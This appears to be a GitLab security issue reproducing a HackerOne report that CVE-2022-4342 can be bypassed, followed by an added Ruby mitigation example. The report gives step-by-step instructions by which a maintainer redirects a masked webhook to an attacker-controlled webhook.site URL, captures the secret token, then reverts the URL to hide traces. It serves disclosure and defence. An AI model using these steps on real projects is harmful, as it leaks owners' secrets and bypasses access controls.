CVE-2022-4342 Bypassed - Maintainer can leak masked webhook secrets by changing target URL of the webhook

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1915507 by theluci on 2023-03-23, assigned to @ottilia_westerlund:


Report

Hello, I found that CVE-2022-4342, which was fixed in version 15.7.2, can be bypassed, and a malicious maintainer can leak masked webhook secrets by changing the target URL of the webhook.

Summary

There is an option to mask parts of a webhook URL to treat it as a secret value.
https://docs.gitlab.com/ee/user/project/integrations/webhooks.html#mask-sensitive-portions-of-webhook-urls

When this feature is used any secret string in the configured URL will be masked in the UI and in any logs in the UI. The values work the same as other tokens in that they are not even accessible by the user configuring it after it is first configured. It should not be possible for the initial user or any other users to retrieve these values.

The docs state this about the secret:

Sensitive portions do not get logged and are encrypted at rest in the database.

However, there is a way to leak masked webhook secrets by masking the attacker-controlled server URL itself (see Steps/POC).

POC

CVE-2022-4342_Bypassed.mp4

Steps to reproduce on Gitlab.com

victim is the owner of the project project-victim
attacker is a maintainer in project-victim

  1. victim goes to his project-victim webhook settings, https://gitlab.com/GROUP/PROJECT/-/hooks
  2. victim configures a webhook with a secret token and masks the secret token. For example, put the URL like this: https://example.com?token=secret-token
  3. Click to add a mask, add the value secret-token with the replacement token. Click save for the webhook.

a0.png

  4. attacker goes to project-victim webhook settings, https://gitlab.com/GROUP/PROJECT/-/hooks
  5. Scroll to the bottom of the page to the list of configured hooks and edit the webhook.
  6. attacker edits the URL to an "attacker controlled server" (I used https://webhook.site to catch the request). Keep the token={token} part, like this: `https://WEBHOOK.SITE?token={TOKEN}`, and mask the URL of the attacker-controlled server as shown in the image.

a1.png

  7. Click save.
  8. Click test.
  9. Check your server to see that the request is sent to the new URL and contains the secret token.

a2.png

  10. attacker can remove the trace by changing the URL back to the original URL.

Impact

Maintainers can leak secret masked values that should not be accessible after configuration.
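One mitigation for the behaviour the report describes, as an added Ruby example that is not GitLab's code: a minimal webhook model where changing the URL template discards the stored masked values, so whoever edits the URL must re-enter every secret, shown next to the permissive update that carries the old values over. The class and method names (MaskedWebhook, url_variables, unsafe_update) are assumptions for illustration.

```ruby
# Added example (not GitLab's code). Models a webhook URL with {VAR}
# placeholders backed by masked values, and two update rules for it.
class MaskedWebhook
  class InvalidUpdate < StandardError; end

  attr_reader :url, :url_variables

  def initialize(url:, url_variables:)
    @url = url
    @url_variables = url_variables.dup
    validate_placeholders!
  end

  # Placeholder names referenced by the URL template, e.g. ["TOKEN"].
  def placeholders
    url.scan(/\{([A-Za-z0-9_]+)\}/).flatten.uniq
  end

  # The URL actually requested, with masked values substituted in.
  def interpolated_url
    url.gsub(/\{([A-Za-z0-9_]+)\}/) { url_variables.fetch(Regexp.last_match(1)) }
  end

  # Hardened update: if the URL template changes, only the values supplied
  # with this edit are kept, so every placeholder must be re-entered.
  # Keeping the URL unchanged still allows rotating a single value.
  def update(new_url:, new_url_variables: {})
    vars = new_url == url ? url_variables.merge(new_url_variables) : new_url_variables
    self.class.new(url: new_url, url_variables: vars)
  end

  # The behaviour the report exploits: stored secrets are carried over to a
  # new URL, so a {TOKEN} placeholder keeps resolving to the victim's value.
  def unsafe_update(new_url:, new_url_variables: {})
    self.class.new(url: new_url, url_variables: url_variables.merge(new_url_variables))
  end

  private

  # Every placeholder in the template must have a masked value.
  def validate_placeholders!
    missing = placeholders - url_variables.keys
    raise InvalidUpdate, "no value for #{missing.join(', ')}" unless missing.empty?
  end
end
```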

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: